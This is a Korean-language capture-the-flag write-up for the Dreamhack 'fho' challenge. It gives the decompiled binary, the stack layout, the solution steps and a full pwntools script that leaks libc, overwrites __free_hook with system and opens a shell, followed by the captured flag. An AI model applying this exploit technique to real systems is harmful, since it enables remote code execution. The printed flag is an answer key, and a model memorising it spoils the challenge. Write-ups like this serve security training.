Description
Exploit Tech: Hook Overwrite에서 실습하는 문제입니다.
checksec
iotfragile@iotfragile:~/CTF/fho$ checksec --file fho
[*] '/home/iotfragile/CTF/fho/fho'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
fho.c
int __cdecl main(int argc, const char **argv, const char **envp)
{
void *ptr; // [rsp+0h] [rbp-50h] BYREF
__int64 v5; // [rsp+8h] [rbp-48h] BYREF
char buf[56]; // [rsp+10h] [rbp-40h] BYREF
unsigned __int64 v7; // [rsp+48h] [rbp-8h]
v7 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(_bss_start, 0LL, 2, 0LL);
puts("[1] Stack buffer overflow");
printf("Buf: ");
read(0, buf, 0x100uLL);
printf("Buf: %s\n", buf);
puts("[2] Arbitary-Address-Write");
printf("To write: ");
__isoc99_scanf("%llu", &ptr);
printf("With: ");
__isoc99_scanf("%llu", &v5);
printf("[%p] = %llu\n", ptr, v5);
*(_QWORD *)ptr = v5;
puts("[3] Arbitrary-Address-Free");
printf("To free: ");
__isoc99_scanf("%llu", &ptr);
free(ptr);
return 0;
}
Stack
================
RET
================
RBP
================
Stack Canary (v7) <- rbp-0x8
================
buf[56] <- rbp-0x40
================
v5 (With: ) <- rbp-0x48
================
*ptr (To Write: ) <- rbp-0x50
================
Solution
- 스택에서 RET을 가리키는 주소가 노출될때까지 버퍼오버플러우를 일으킨다.
- RET은 libc main 주소의 복귀주소를 가리키므로 이것을 통해 libc base address를 가져올 수 있다.
- To Write인 메모리에 쓸 곳은 _free_hook으로 가리키게 만들고, With인 쓸 내용은 system 함수를 가리키게 만든다.
- 이제 free 함수에 호출될 매개변수에 “/bin/sh” 주소를 넣어두면 쉘을 얻을 수 있다.
solve.py
from pwn import *
#context.log_level = 'debug'
warnings.filterwarnings('ignore')
p = remote('host3.dreamhack.games', 9553)
p.recvuntil("Buf: ")
payload = b"A" * 72
p.send(payload)
ret_to_libc = p.recvuntil('[2] Arbitary-Address-Write')
ret_to_libc = ret_to_libc[77:].split(b'\n')[0] + b"\x00"*2
print(len(ret_to_libc))
print(u64(ret_to_libc))
print(hex(u64(ret_to_libc)))
ret_to_libc = u64(ret_to_libc)
libc_base = ret_to_libc - 0x21BF7
print("libc_base: " + hex(libc_base))
free_hook = libc_base + 0x3ED8E8
system = libc_base + 0x4f550
p.recvuntil("To write: ")
p.sendline(str(free_hook))
p.recvuntil("With: ")
p.sendline(str(system))
p.recvuntil("To free: ")
p.send(str(libc_base + 0x1B3E1A))
p.interactive()
Result
iotfragile@iotfragile:~/CTF/fho$ python3 solve.py
[+] Opening connection to host3.dreamhack.games on port 9553: Done
8
140600301456375
0x7fe00f060bf7
libc_base: 0x7fe00f03f000
[*] Switching to interactive mode
$ ls
$ ls
fho
flag
$ cat flag
DH{a8529ace5e50480658a645aa1a1c88291784335c1c54c5b89d0f43ad1893730c}
$ q
FLAG
DH{a8529ace5e50480658a645aa1a1c88291784335c1c54c5b89d0f43ad1893730c}
